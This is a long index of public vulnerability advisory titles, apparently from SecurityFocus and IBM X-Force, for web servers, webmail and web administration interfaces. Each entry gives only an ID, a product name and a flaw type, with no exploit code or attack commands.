[5819] BEA WebLogic Server and Express HTTP Response Information Disclosure Vulnerability
[5815] WatchGuard Firebox VClass CLI Interface Improperly Terminated Connection Vulnerability
[5814] WatchGuard Firebox VClass CLI Interface Format String Vulnerability
[5813] Zope Through The Web Code Remote Denial Of Service Vulnerability
[5803] MDG Web Server 4D Insecure Credential Storage Vulnerability
[5802] PHPWebSite News Message HTML Injection Vulnerability
[5794] NullLogic Null Webmail Format String Vulnerability
[5793] ACWeb Cross-Site Scripting Vulnerability
[5782] Dino's Webserver File Disclosure Vulnerability
[5779] phpWebsite PHP File Include Vulnerability
[5773] HP WEBES Service Tools Compaq Analyze Unauthorized File Access Vulnerability
[5749] IBM WebSphere Large HTTP Header Buffer Overflow Vulnerability
[5725] DB4Web Connection Proxy Vulnerability
[5723] DB4Web File Disclosure Vulnerability
[5710] PlanetWeb Long GET Request Buffer Overflow Vulnerability
[5709] Savant Webserver File Disclosure Vulnerability
[5707] Savant Webserver Malformed Content-Length Denial Of Service Vulnerability
[5706] Savant Webserver cgitest.exe Denial Of Service Vulnerability
[5699] ht://Check Web Header Script Injection Vulnerability
[5686] Savant Webserver Buffer Overflow Vulnerability
[5674] Wordtrans-web Script Injection Vulnerability
[5671] Wordtrans-web Remote Command Execution Vulnerability
[5664] SWS Simple Web Server New Line Denial Of Service Vulnerability
[5662] SWS Simple Web Server File Disclosure Vulnerability
[5660] SWS Simple Web Server Stack Corruption Vulnerability
[5659] SWS Simple Web Server Non-existent File Request Denial Of Service Vulnerability
[5615] Cisco HTTP Interface Long Request Denial Of Service Vulnerability
[5600] FactoSystem Weblog Multiple SQL Injection Vulnerabilities
[5597] Alan Ward A-Cart Web Accessible Database File Vulnerability
[5591] Webmin RPC Function Privilege Escalation Vulnerability
[5549] Abyss Web Server Malicious HTTP Request Information Disclosure Vulnerability
[5548] Abyss Web Server Administrative Console Unauthorized Access Vulnerability
[5547] Abyss Web Server Encoded Backslash Directory Traversal Vulnerability
[5519] WebEasyMail POP3 Server Valid User Name Information Disclosure Vulnerability
[5518] WebEasyMail SMTP Service Format String Vulnerability
[5507] Kerio MailServer Web Mail Multiple Cross Site Scripting Vulnerabilities
[5474] Webscriptworld Web Shop Manager Remote Arbitrary Command Execution Vulnerability
[5471] MyWebServer Invalid Path Web Root Disclosure Vulnerability
[5470] MyWebServer Long HTTP Request HTML Injection Vulnerability
[5469] MyWebServer Search Request Remote Buffer Overflow Vulnerability
[5464] GoAhead WebServer Remote Arbitrary Command Execution Vulnerability
[5456] CafeLog b2 WebLog Tool SQL Injection Vulnerability
[5455] CafeLog b2 WebLog Tool Cross Site Scripting Vulnerability
[5435] BlueFace Falcon Web Server Error Message Cross-Site Scripting Vulnerability
[5433] Sun ONE/iPlanet Web Server Chunked Encoding Vulnerability
[5418] Ensim Webppliance Unauthorized Email Access Vulnerability
[5384] Inso DynaWeb httpd Format String Vulnerability
[5368] HP JetDirect Embedded Web Server Password Handling Vulnerability
[5365] IPSwitch IMail Web Calendaring Incomplete Post Denial Of Service Vulnerability
[5345] Abyss Web Server HTTP GET Request Directory Contents Disclosure Vulnerability
[5323] IPSwitch IMail Web Messaging HTTP Get Buffer Overflow Vulnerability
[5290] Multiple Vendor Web Browser JavaScript Modifier Keypress Event Subversion Vulnerability
[5276] Working Resources BadBlue Administrative Interface Arbitrary File Access Vulnerability
[5263] Sun Java Web Start JNLP Predictable File Location Vulnerability
[5238] IMHO Webmail Account Hijacking Vulnerability
[5231] Novell NetMail WebAdmin Buffer Overflow Vulnerability
[5230] Novell NetMail ModWeb Buffer Overflow Vulnerability
[5220] Pingtel Expressa Web Server Cross-Site Scripting Vulnerability
[5198] GoAhead WebServer Error Page Cross Site Scripting Vulnerability
[5197] GoAhead WebServer URL Encoded Slash Directory Traversal Vulnerability
[5191] iPlanet Web Server Search Component File Disclosure Vulnerability
[5184] MyWebServer GET Request Buffer Overflow Vulnerability
[5177] Key Focus KF Web Server Directory Contents Disclosure Vulnerability
[5175] Webresolve Host Name Buffer Overflow Vulnerability
[5159] BEA Systems WebLogic Server and Express Race Condition Denial of Service Vulnerability
[5139] AnalogX Proxy Web Proxy Buffer Overflow Vulnerability
[5127] Simple WAIS Interface Arbitrary Command Execution Vulnerability
[5119] Multiple Vendor WEB-INF Directory Contents Disclosure Vulnerability
[5089] BEA Systems WebLogic Access Controls Bypass Vulnerability
[5080] GameCheats Advanced Web Server Malformed HTTP Request Denial Of Service Vulnerability
[5065] BasiliX Webmail Mail Attachment Disclosure Vulnerability
[5062] BasiliX Webmail Arbitrary File Disclosure Vulnerability
[5061] BasiliX Webmail SQL Injection Vulnerability
[5060] BasiliX Webmail Message Content Script Injection Vulnerability
[5054] Apache Tomcat Web Root Path Disclosure Vulnerability
[5048] WebScripts WebBBS Remote Command Execution Vulnerability
[5045] 4D WebServer Long HTTP Request Buffer Overflow Vulnerability
[5036] NetGear RP114 Administrative Access Via External Interface Vulnerability
[5035] Wolfram Research webMathematica File Disclosure Vulnerability
[5006] AnalogX SimpleServer:WWW Web Server Buffer Overflow Vulnerability
[4982] Belkin F5D5230-4 Router Internal Web Traffic Origin Obfuscation Vulnerability
[4976] BizDesign ImageFolio Authorized User Web Root Disclosure Vulnerability
[4962] WebCalendar Edit_User_Handler.PHP Unauthorized Access Vulnerability
[4961] WebCalendar Include Files Information Disclosure Vulnerability
[4954] Microsoft Internet Explorer FTP Web View Cross Site Scripting Vulnerability
[4897] Evolvable Shambala Server Web Server Denial Of Service Vulnerability
[4877] Apache Tomcat Example Files Web Root Path Disclosure Vulnerability
[4874] Netscape Enterprise Web Server for Netware Information Disclosure Vulnerability
[4860] Tomahawk Technologies SteelArrow Web Application Server Multiple Buffer Overflow Vulnerabilities
[4856] Oracle Web Cache Remotely Exploitable Buffer Overflow Vulnerabilities
[4851] iPlanet Web Server Search Component Buffer Overflow Vulnerability
[4833] BlueFace Falcon Web Server File Disclosure Vulnerability
[4820] LocalWEB2000 File Disclosure Vulnerability
[4783] Deerfield WebSite Pro 8.3 Filename Source Disclosure Vulnerability
[4756] Clicky Web Pseudo-frames Remote File Include Vulnerability
[4740] NOCC Webmail Script Injection Vulnerability
[4734] BEA WebLogic Server and Express File Disclosure Vulnerability
[4733] BEA Systems WebLogic Server and Express Password Disclosure Vulnerability
[4728] Seminole Webserver Invalid Request Heap Corruption Vulnerability
[4727] Seminole Webserver Empty Request Denial of Service Vulnerability
[4712] Cisco ATA-186 Web Administration Authentication Bypass Vulnerability
[4700] Webmin / Usermin Authentication Bypass Vulnerability
[4694] Webmin / Usermin Login Cross Site Scripting Vulnerability
[4691] Lysias Lidik Webserver Directory Traversal Vulnerability
[4670] askSam Web Publisher Cross Site Scripting Vulnerability
[4665] 4D WebServer Authentication Buffer Overflow
[4646] BEA Systems WebLogic Server and Express Null Character DOS Device Denial of Service Vulnerability
[4645] BEA Systems WebLogic Server and Express URL Parsing Source Code Disclosure Vulnerability
[4643] BEA Systems WebLogic Server and Express URL Parsing Path Disclosure Vulnerability
[4622] PhpWebGallery Cookie Manipulation Account Compromise Vulnerability
[4531] WebTrends Reporting Center GET Request Buffer Overflow Vulnerability
[4530] TalentSoft Web+ WML Request Cookie Buffer Overflow Vulnerability
[4528] Microsoft BackOffice Server Web Administration Authentication Bypass Vulnerability
[4504] Bradford Barrett Webalizer Reverse DNS Buffer Overflow Vulnerability
[4503] StepWeb Search Engine Admin Webpage Access Vulnerability
[4498] IBM Informix Web Datablade SQL Query HTML Decoding Vulnerability
[4496] IBM Informix Web Datablade Page Request SQL Injection Vulnerability
[4467] Abyss Web Server Plaintext Administrative Password Vulnerability
[4466] Abyss Web Server File Disclosure Vulnerability
[4457] Microsoft Office Web Components Clipboard Information Disclosure Vulnerability
[4454] Microsoft Office Web Components Chart Local File Existence Disclosure Vulnerability
[4453] Microsoft Office Web Components Local File Read Vulnerability
[4449] Microsoft Office Web Components Active Script Execution Vulnerability
[4425] Quik-Serv Web Server Arbitrary File Disclosure Vulnerability
[4390] Microsoft Outlook Web Access with RSA SecurID Authentication Bypass Vulnerability
[4382] Citrix Nfuse boilerplate.asp Web Root Disclosure Vulnerability
[4361] Instant Web Mail POP Command Execution Vulnerability
[4357] WebSight Directory System Cross Site Scripting Vulnerability
[4354] tagtraum industries Jo! Webserver Cross Site Scripting Vulnerability
[4351] Webmin Plaintext Authentication Credentials Disclosure Vulnerability
[4343] Qualcomm Eudora WebBrowser Control Embedded Media Player File Vulnerability
[4342] HP Praesidium Webproxy Unauthorized Access Vulnerability
[4333] PHP Nuke Error Message Web Root Disclosure Vulnerability
[4329] Webmin Script Code Input Validation Vulnerability
[4328] Webmin Insecure Directory Permissions Vulnerability
[4312] Big Sam Web Root Disclosure Vulnerability
[4310] Multiple Vendor Java Web Start Unsigned Application Vulnerability
[4305] Board-TNK Web Information Cross-Agent Scripting Vulnerability
[4292] Oracle 9iAS Apache PL/SQL Module Web Administration Access Vulnerability
[4282] TalentSoft Web+ Web Markup Language Buffer Overflow Vulnerability
[4261] John Roy Pi3Web Path Disclosure Vulnerability
[4233] TalentSoft Web+ Webpsvc Buffer Overflow Vulnerability
[4206] Novell GroupWise Web Root Disclosure Vulnerability
[4186] Galacticomm Worldgroup Remote Web Server Denial of Service Vulnerability
[4160] Essentia Web Server Directory Traversal Vulnerability
[4159] Essentia Web Server Long URL Buffer Overflow Vulnerability
[4156] NetWin WebNEWS Default Account Vulnerability
[4145] Nombas ScriptEase:WebServer Edition GET Request Denial of Service Vulnerability
[4128] Nombas ScriptEase:WebServer Edition Denial of Service Vulnerability
[4124] NetWin WebNEWS Remote Buffer Overflow Vulnerability
[4123] Dino's Webserver Denial of Service Vulnerability
[4119] Phusion Webserver Long URL Buffer Overflow Vulnerability
[4118] Phusion Webserver Long URL Denial Of Service Vulnerability
[4117] Phusion Webserver Directory Traversal Vulnerability
[4110] Blue World Lasso Web Data Engine Vulnerability
[4099] BlueFace Falcon Web Server Authentication Bypass Vulnerability
[4020] Lotus Domino Webserver DOS Device Extension Denial of Service Vulnerability
[4013] PHPWebThings Utility Script Direct Access Vulnerability
[3962] Ganglia PHP RRD Web Client Remote Command Execution Vulnerability
[3939] W3Perl Web Statistics Header Manipulation Vulnerability
[3936] Caldera UnixWare WebTop SCOAdminReg.CGI Arbitrary Command Execution Vulnerability
[3930] Cyberstop Web Server Long Request DoS Vulnerability
[3929] Cyberstop Web Server MS-DOS Device Denial of Service Vulnerability
[3922] COWS CGI Online Worldweb Shopping Insecure File Permissions Vulnerability
[3921] COWS CGI Online Worldweb Shopping Compatible.CGI Cross-Site Scripting Vulnerability
[3915] COWS CGI Online Worldweb Shopping Information Disclosure Vulnerability
[3914] COWS CGI Online Worldweb Shopping Diagnose.CGI Cross-Site Scripting Vulnerability
[3908] Joe Testa hellbent Relative Web Root Path Information Disclosure Vulnerability
[3876] NetGear RP114 Cable/DSL Web Safe Router WAN Port DoS Vulnerability
[3874] MDG Computer Services Web Server 4D/eCommerce DoS Vulnerability
[3866] John Roy Pi3Web For Windows Long Request Buffer Overflow Vulnerability
[3861] Dino's Webserver Directory Traversal Vulnerability
[3841] Cacheflow CacheOS Web Administration Arbitrary Cached Page Code Leakage Vulnerability
[3831] Netscape Enterprise Web Server Brute Force Authentication Attacks Vulnerability
[3826] Netscape Enterprise Server Web Publisher DoS Vulnerability
[3816] BEA Systems WebLogic Server DOS Device Denial of Service Vulnerability
[3814] Anti-Web HTTPD Script Engine Heap Overflow Vulnerability
[3788] Michael Lamont Savant Web Server Long Request DoS Vulnerability
[3782] Anti-Web HTTPD Script Engine File Opening Denial Of Service Vulnerability
[3765] Oracle Oracle9iAS Web Cache HTTP Header DoS Vulnerability
[3764] Oracle Oracle9iAS Web Cache World Readable Password File Vulnerability
[3762] Oracle9iAS Web Cache Multiple Periods Denial Of Service Vulnerability
[3761] Oracle9iAS Web Cache Privilege Escalation Vulnerability
[3760] Oracle9iAS Web Cache Null Character Denial Of Service Vulnerability
[3746] ELSA Lancom 1100 Office Insecure Web Administration Vulnerability
[3715] Nombas ScriptEase:Webserver Edition Default Script Vulnerability
[3709] HP-UX 11.04 (VVOS) Virtual Vault/IPlanet Web Server DoS Vulnerability
[3698] Webmin Directory Traversal Vulnerability
[3685] IBM Tivoli Policy Director WebSeal Denial Of Service Vulnerability
[3682] IBM WebSphere JSP Root Password Disclosure Vulnerability
[3678] WebGlimpse Character Filtering Arbitrary Command Execution Vulnerability
[3677] NOCC Webmail Unauthenticated Outgoing Mail Access
[3666] Allaire JRun Web Server Directory Traversal Vulnerability
[3655] Kebi WebMail Unauthenticated Administration Vulnerability
[3601] Network Associates WebShield SMTP Malformed Mime Header Vulnerability
[3592] Allaire JRun Web Root Directory Disclosure Vulnerability
[3577] Stronghold Secure Web Server Information Disclosure Vulnerability
[3575] IBM Informix Web Datablade Directory Traversal Vulnerability
[3568] Oracle9iAS Web Cache HTTP Content Header Denial Of Service Vulnerability
[3547] Cisco Local Interface ARP Denial of Service Vulnerability
[3511] Xitami Webserver empty GET request DoS Vulnerability
[3473] Bradford Barrett Webalizer Cross-Agent Scripting Vulnerability
[3469] Microsoft Internet Explorer JavaScript Interface Spoofing Vulnerability
[3462] RSA SecurID WebID Debug Mode Information Disclosure Vulnerability
[3461] RSA SecurID WebID Unicode Directory Traversal Vulnerability
[3459] Webmin Temporary Insecure File Creation Vulnerability
[3453] Mountain Network Systems WebCart Command Execution Vulnerability
[3449] Oracle9iAS Web Cache Buffer Overflow DoS Vulnerability
[3443] Oracle9iAS Web Cache Buffer Overflow Vulnerability
[3431] Ipswitch IMail Web Calendar Buffer Overflow Vulnerability
[3385] Grant Horwood Webodex Remote Arbitrary Code Execution Vulnerability
[3373] COM2001 Alexis Server Web Access Plaintext Password Vulnerability
[3354] Squid Web Proxy Cache Denial of Service Vulnerability
[3349] IBM WebSphere Application Server Predictable Session ID Vulnerability
[3340] WebDiscount E-Shop Remote Arbitrary Command Execution Vulnerability
[3328] Textor Webmasters Limited ListRec.pl Input Validation Vulnerability
[3296] Baltimore Technologies WEBsweeper Restricted Directory Disclosure Vulnerability
[3290] Gauntlet Firewall for Unix and WebShield CSMAP and smap/smapd Buffer Overflow Vulnerability
[3228] Respondus for WebCT Weak Password Encryption Vulnerability
[3224] A-V Tronics InetServ Webmail Authentication Buffer Overflow Vulnerability
[3223] Microsoft Outlook Web Access Denial of Service Vulnerability
[3211] JavaServer Web Development Kit v1.0 Directory Traversal Vulnerability
[3209] 4D WebServer v6.5.7 Directory Traversal Vulnerability
[3206] FreeBSD IPFW Me Point To Point Interface Address Addition Vulnerability
[3194] Microsoft IIS WebDAV Invalid Request Denial of Service Vulnerability
[3182] Webridge PX Application Suite Internal Server Error Message Vulnerability
[3175] SIX-webboard 2.01 File Retrieval Vulnerability
[3173] WEBsweeper Unicode Script Filtering Bypass Vulnerability
[3172] WEBsweeper Script Filtering Bypass Vulnerability
[3161] ZyXEL Prestige Router Administration Interface Vulnerability
[3062] Squid Web Proxy Reverse Proxy Vulnerability
[3059] Squid Web Proxy Cross-Site Scripting Vulnerability
[3050] Cognos Powerplay Web Edition CGI Parameters Vulnerability
[3035] Cognos Powerplay Web Edition Weak Temp File Name Vulnerability
[3012] Opera Web Browser Malformed Header Vulnerability
[2995] Basilix Webmail File Disclosure Vulnerability
[2987] Cobalt Qube Webmail Directory Traversal Vulnerability
[2979] vWebServer Long URL Denial of Service Vulnerability
[2978] vWebServer MS DOS Device Name Denial of Service Vulnerability
[2975] VWebServer ASP Source Code Disclosure Vulnerability
[2969] IBM WebSphere Cross-Site Scripting Vulnerability
[2959] Trend Micro InterScan WebManager HttpSave.dll Buffer Overflow Vulnerability
[2956] Citrix Nfuse Webroot Disclosure Vulnerability
[2945] MacOS Personal Web Sharing Authentication DoS Vulnerability
[2938] Gnatsweb Remote Command Execution Vulnerability
[2907] Trend Micro InterScan WebManager RegGo.dll Buffer Overflow Vulnerability
[2890] Tarantella TTAWebTop.CGI Arbitrary File Viewing Vulnerability
[2861] cgiCentral WebStore Arbitrary Command Execution Vulnerability
[2860] cgiCentral Webstore Administrator Authentication Bypass Vulnerability
[2858] IBM WebSphere Net.Commerce Unprotected Configuration File Vulnerability
[2830] iNetLab WebShop Credit Card Exposure Vulnerability
[2814] O'Reilly WebBoard Pager Hostile JavaScript Vulnerability
[2812] WebTrends Reporting Server Script Source Code Disclosure Vulnerability
[2795] Webmin Environment Variable Information Disclosure Vulnerability
[2791] TWIG Webmail SQL Query Modification Vulnerability
[2740] Apache Web Server HTTP Request Denial of Service Vulnerability
[2736] IIS WebDav Lock Method Memory Leak DoS Vulnerability
[2732] iPlanet Web Publisher Remote Buffer Overflow Vulnerability
[2715] MacOS 9 Personal Web Sharing Remote DoS Vulnerability
[2690] Microsoft IIS WebDAV 'Propfind' Server Restart Vulnerability
[2676] BRS WebWeaver FTP Root Path Disclosure Vulnerability
[2675] BRS WebWeaver Directory Traversal Vulnerability
[2665] Excite for Web Servers 1.1 Administrative Password Vulnerability
[2664] Mirabilis ICQ Web Front Plug-In DoS Vulnerability
[2662] SAP Web Application Server for Linux Arbitrary Command Execution Vulnerability
[2660] DataWizard WebXQ Directory Traversal Vulnerability
[2659] Tektronix Phaser Network Printer Administration Interface Vulnerability
[2653] PowerScripts PlusMail WebConsole Poor Authentication Vulnerability
[2650] NetCruiser Software NetCruiser Web Server Path Disclosure Vulnerability
[2648] Perl Web Server Path Traversal Vulnerability
[2647] Opera Web Browser 5 Warning Dialogue Bypass Vulnerability
[2643] Viking Server Relative Path Webroot Escaping Vulnerability
[2639] WebCalendar Remote Command Execution Vulnerability
[2628] CrossWind CyberScheduler websyncd remote Buffer Overflow Vulnerability
[2625] Microsoft Windows WebDAV Scripted Request Vulnerability
[2622] Xitami Webserver MS-DOS Device Name DoS Vulnerability
[2607] GoAhead Webserver /aux Denial of Service Vulnerability
[2600] Microsoft ISA Server Web Proxy DoS Vulnerability
[2588] IBM Websphere/Net.Commerce CGI-BIN Macro Denial of Service Vulnerability
[2587] IBM Websphere/Net.Commerce Installation Directory Revealing Vulnerability
[2568] Alcatel Speed Touch ADSL Insecure Administration Interface Vulnerability
[2565] Lotus Domino Web Server HTTP Header DoS Vulnerability
[2547] Way to the Web TalkBack.cgi Directory Traversal Vulnerability
[2513] BEA Systems WebLogic Server Directory Traversal Vulnerability
[2494] Gordano NTMail Web Services DoS Vulnerability
[2488] Website Professional Web Directory Disclosure Vulnerability
[2483] Microsoft IIS WebDAV 'Search' Denial of Service Vulnerability
[2482] IBM Net.Commerce WebSphere Weak Password Vulnerability
[2468] Michael Lamont Savant Web Server DoS Vulnerability
[2465] Baltimore Technologies WEBsweeper DoS Vulnerability
[2461] Cisco Aironet Web Administration Access Vulnerability
[2453] Microsoft IIS WebDAV Denial of Service Vulnerability
[2432] Orange Web Server DoS Vulnerability
[2425] Sapio WebReflex GET Denial Of Service Vulnerability
[2416] Netscape Web Publisher Arbitrary Remote File Disclosure Vulnerability
[2413] SEDUM HTTP Webserver Denial of Service Vulnerability
[2401] IBM Websphere Cross-Site Scripting Vulnerability
[2399] Webmin Symlink Vulnerability
[2388] Bajie Webserver Remote Command Execution Vulnerability
[2386] ITAfrica WEBactive Directory Traversal Vulnerability
[2381] John Roy Pi3Web Buffer Overflow Vulnerability
[2375] BiblioWeb Remote Buffer Overflow Vulnerability
[2373] BiblioWeb Server Directory Traversal Vulnerability
[2372] MnSCU/PALS WebPALS Remote Command Execution Vulnerability
[2362] SilverPlatter WebSPIRS File Disclosure Vulnerability
[2336] Heat-On HSWeb Web Server Path Disclosure Vulnerability
[2334] GoAhead WebServer Directory Traversal Vulnerability
[2314] iWeb Hyperseek 2000 Directory Traversal Vulnerability
[2294] Netscape Enterprise Server Web Publishing DoS Vulnerability
[2281] Mountain-net WebCart Exposed Orders Vulnerability
[2269] Microsoft Index Server Webhits.dll ASP Source Disclosure Vulnerability
[2268] LocalWEB2000 Directory Traversal Vulnerability
[2248] Excite for Web Servers 1.1 Command Execution Vulnerability
[2216] Apache Web Server DoS Vulnerability
[2200] Compaq Web Admin Buffer Overflow Vulnerability
[2199] Microsoft Web Client Extender NTLM Authentication Vulnerability
[2198] Basilix Webmail Incorrect File Permissions Vulnerability
[2178] WebMaster ConferenceRoom Developer Edition DoS Vulnerability
[2175] IBM HTTP Server AfpaCache/WebSphereNet.Data DoS Vulnerability
[2171] Oracle Apache+WebDB Documented Backdoor Vulnerability
[2168] Informix Webdriver Local File Overwrite Vulnerability
[2166] Informix Webdriver Remote Administration Access Vulnerability
[2138] BEA WebLogic Server Double Dot Buffer Overflow Vulnerability
[2078] OReilly WebSite 1.x/2.0 win-c-sample.exe Buffer Overflow Vulnerability
[2077] WEBgais websendmail Remote Command Execution Vulnerability
[2076] Novell Netware Web Server 3.x files.pl Vulnerability
[2060] Apache Web Server with Php 3 File Disclosure Vulnerability
[2058] WEBgais Remote Command Execution Vulnerability
[2047] phpWebLog Administrator Authentication Bypass Vulnerability
[2029] Trlinux Postaci Webmail Password Disclosure Vulnerability
[2026] GlimpseHTTP and WebGlimpse Piped Command Vulnerability
[2025] Novell NetWare Web Server 2.x convert.bas Vulnerability
[2024] Webcom Datakommunikation CGI Guestbook rguest/wguest Vulnerability
[2012] Cisco 600 Series Web Administration Denial of Service Vulnerability
[2011] Ipswitch IMail Web Service HOST Denial Of Service Vulnerability
[1999] Network Associates WebShield SMTP Invalid Outgoing Recipient Field DoS Vulnerability
[1993] Network Associates WebShield SMTP Content Filter Bypass Vulnerability
[1896] WebObjects Remote Overflow Vulnerability
[1891] Sun JavaWebServer Viewable .jhtml Source Vulnerability
[1888] CS&T CorporateTime for the Web Brute Force Vulnerability
[1848] iPlanet Webserver .shtml Buffer Overflow Vulnerability
[1822] 4D Inc. WebSTAR DoS Vulnerability
[1793] Microsoft Internet Explorer Cached Web Credentials Disclosure Vulnerability
[1776] Bytes Interactive Web Shopper Directory Traversal Vulnerability
[1774] Extropia WebStore Directory Traversal Vulnerability
[1770] Boa Webserver 0.94.2.x File Disclosure Vulnerability
[1763] IBM WebSphere ikeyman Weak Encrypted Password Vulnerability
[1732] WebTeacher WebData File Import Vulnerability
[1725] Talentsoft Web+ Example Script File Disclosure Vulnerability
[1722] Talentsoft Web+ Source Code Disclosure Vulnerability
[1720] Talentsoft Web+ Internal IP Address Disclosure Vulnerability
[1691] WebSphere Application Server Plugin DoS Vulnerability
[1671] Microsoft WebTV DoS Vulnerability
[1656] SuSE Apache WebDAV Directory Listings Vulnerability
[1648] QNX Voyager Webserver Multiple Vulnerabilities
[1640] Gordano NTMail Web Configuration DoS Vulnerability
[1611] O'Reilly WebSite Pro Write Access Vulnerability
[1600] Sun Java Web Server Web Admin / Bulletin Board Vulnerability
[1589] Network Associates WebShield SMTP Trailing Period DoS Vulnerability
[1581] HP OpenView Network Node Manager 6.1 Web Password Vulnerability
[1570] BEA Weblogic Proxy Multiple Buffer Overflow Vulnerabilities
[1554] Solaris AnswerBook2 Administration Interface Access Vulnerability
[1525] Weblogic Remote Command Execution Vulnerability
[1522] Bajie Webserver File Reading Vulnerability
[1521] Bajie Webserver Absolute Path Disclosure Vulnerability
[1518] Weblogic FileServlet Show Code Vulnerability
[1517] Weblogic SSIServlet Show Code Vulnerability
[1510] Roxen WebServer %00 Request File/Directory Disclosure Vulnerability
[1500] IBM WebSphere Showcode Vulnerability
[1498] Default Sun Java Web Server Servlets Vulnerability
[1497] WEBactive HTTP Server Default Log Vulnerability
[1492] O'Reilly WebSite GET Buffer Overflow Vulnerability
[1490] L-Soft Listserv 1.8c and 1.8d Web Archives Long QUERY_STRING Buffer Overflow Vulnerability
[1487] O'Reilly WebSite 'webfind.exe' Buffer Overflow Vulnerability
[1485] CSM Alibaba Web Server Piped Command Vulnerability
[1482] CSM Alibaba Web Server DoS Vulnerability
[1470] WEBactive HTTP Server Long GET Request Vulnerability
[1469] CVSWeb insecure perl open Vulnerability
[1463] ICQ Web Front Remote DoS Attack Vulnerability
[1459] Sun Java Web Server Vulnerability
[1453] Savant Web Server Buffer Overflow Vulnerability
[1427] Oracle Web Listener Denial of Service Vulnerability
[1423] LocalWEB HTTP Buffer Overflow Vulnerability
[1422] Webmin Multiple SSL Session Requests Denial of Service Vulnerability
[1410] Network Associates WebShield SMTP Filtering Rules Bypass Vulnerability
[1391] Netwin DMailWeb & CWMail Server DoS Vulnerability
[1390] Netwin DMailWeb & CWMail Server Mail Relaying Vulnerability
[1378] BEA Systems WebLogic Server and Express Source Code Disclosure Vulnerability
[1376] Netwin DMailWeb & CWMail Multiple DoS Vulnerabilities
[1365] WebBBS Web Server Multiple Buffer Overflow Vulnerability
[1347] Extropia WebBanner Input Validation Vulnerability
[1313] Savant Web Server CGI Source Code Disclosure Vulnerability
[1286] Concatus IMate Web Mail Server 2.5 Buffer Overflow Vulnerability
[1254] Network Associates WebShield SMTP 4.5.44 Buffer Overflow Vulnerability
[1253] Network Associates WebShield SMTP Configuration Modification Vulnerability
[1246] HP Web JetAdmin 6.0 Printing DoS Vulnerability
[1243] HP Web JetAdmin Directory Traversal Vulnerability
[1238] Cobalt RaQ2/RaQ3 Web Server Appliance cgiwrap bypass Vulnerability
[1237] Multiple Vendor Web Shopping Cart Hidden Form Field Vulnerability
[1171] Netwin Dmailweb Server utoken Buffer Overflow Vulnerability
[1167] L-Soft Listserv 1.8 Web Archives Buffer Overflow Vulnerability
[1159] FileMaker Pro 5.0 Web Companion Software Multiple Vulnerabilities
[1102] TalentSoft Web+ Directory Traversal Vulnerability
[1099] Tiny WinRoute 3.04 Web Administration Authentication Bypass
[1075] Netscape Enterprise Server Web Publishing Vulnerability
[1056] Atrium Software Mercur WebView WebMail-Client Buffer Overflow Vulnerability
[1053] Oracle Web Listener Batch File Vulnerability
[977] Zeus Web Server Null Terminated Strings Vulnerability
[969] Progress WebSpeed Administration Utility Configuration Vulnerability
[953] Rightfax Webclient Predictable Session Number Vulnerability
[949] InetServ 3.0 WebMail Long GET Request Vulnerability
[932] Website Professional Directory Revealing Vulnerability
[915] Allaire Spectra 1.0 Webtop Vulnerability
[897] Savant Web Server NULL Vulnerability
[892] WebWho+ Remote Command Execution Vulnerability
[881] Lotus Notes Domino Webserver CGI Vulnerabilities
[879] Novell GroupWise GWWEB.EXE Multiple Vulnerabilities
[860] Communigate Pro Web Admin DoS Vulnerability
[844] IBM Websphere Installation Permissions Vulnerability
[841] Oracle Web Listener URL Character Substitution Vulnerability
[820] Mdaemon WebConfig Overflow DoS Vulnerability
[816] Sun Java IDE Webserver IP Restriction Failure Vulnerability
[814] HP JetDirect Internal Webserver Long URL DoS Vulnerability
[806] Tektronix PhaserLink Webserver Vulnerability
[803] WebBBS login & password Buffer Overflow Vulnerability
[743] Falcon Web Server Directory Traversal Vulnerability
[742] Zeus Webserver Possible Remote root Compromise
[741] Squid Web Proxy Authentication Failure Vulnerability
[699] Jana Webserver Directory Traversal Vulnerability
[698] WebTrends Enterprise Reporting Server Multiple Vulnerabilities
[623] Sapphire/Web Authentication Vulnerability
[577] WebRamp Default Administrative Login Vulnerability
[569] WebTrends Enterprise Reporting Server Negative Content Length DoS Vulnerability
[565] DPEC Courseware Web Server Password Vulnerability
[513] WebTrends Multiple Products Stored Password Vulnerability
[505] Ipswitch IMail Web Service Buffer Overflow DoS Vulnerability
[491] Cognos Powerplay Web Edition Dynamic Directory Vulnerability
[374] IRIX cgi-bin webdist.cgi Vulnerability
[282] Compaq Management Agents Web File Access Vulnerability
[281] Computalynx CMail Web File Access Vulnerability
[280] Floosietek FTGate Web File Access Vulnerability
[279] Gordano NTMail Web File Access Vulnerability
[278] SmartDesk WebSuite Buffer Overflow Vulnerability
[273] Netscape Web Server %20 Filename Vulnerability
[253] Solaris ab2 (DynaWeb) Server DoS & Possible Trojan Vulnerability
[194] NT IIS IISAPI Extension Enumerate Root Web Server Directory Vulnerability
[189] NT IIS4 Remote Web-Based Administration Vulnerability
[135] NT Webserver Long File Name Access Protection Vulnerability
[98] Webmin Password Brute Force Vulnerability
[84] Apple Personal Web Sharing Vulnerability
IBM X-Force - https://exchange.xforce.ibmcloud.com:
[85624] Cisco Secure Access Control System Web interface cross-site scripting
[84930] AirLive IP cameras web interface cross-site request forgery
[84923] Sony CH and DH series IP cameras Web interface cross-site request forgery
[84101] OpenVPN Access Server CVE-2013-2692 Admin web interface cross-site request forgery
[83290] Easy FTP Server web interface denial of service
[82584] Foscam Firmware web interface directory traversal
[82123] Niagara AX web interface directory traversal
[82042] Cisco Unified MeetingPlace Server web interface cross-site request forgery
[80681] Huawei E585 web management interface security bypass
[80272] IBM System Storage TS3500 Tape Library Web interface privilege escalation
[77978] McAfee Email and Web Security Web interface directory traversal
[76310] PacketFence Web Admin Guest Management interface module cross-site scripting
[75355] Websense TRITON Report Management Interface favorites.exe authentication bypass
[75354] Websense TRITON Report Management Interface detail.exe cross-site scripting
[74624] TP-Link 8840T DSL Router web interface security bypass
[73534] Multiple IBM products Web interface cross-site request forgery
[73109] Enigma2 Webinterface directory traversal
[72919] Emobile Pocket Wifi GP02 Web Interface cross-site forgery
[72822] Mibew Messenger web interface ban.php and settings.php cross-site request forgery
[72784] Inquisiq R3 LMS web interface cross-site request forgery
[72235] Enigma2 Webinterface information disclosure
[71849] Websense report management interface cross-site scripting
[70922] McAfee Web Gateway web interface cross-site scripting
[68861] Dlink DPH IP phones Web management interface denial of service
[68860] D-Link DPH IP phones Web management interface security bypass
[68859] D-Link DPH IP phones Web management interface
[68858] D-Link DPH IP phones Web management interface file upload
[67836] Cherokee admin web interface cross-site request forgery
[66478] Open Ticket Request System web-interface security bypass
[64245] Afaria web management interface cross-site request forgery
[64138] GIT gitweb interface cross-site scripting
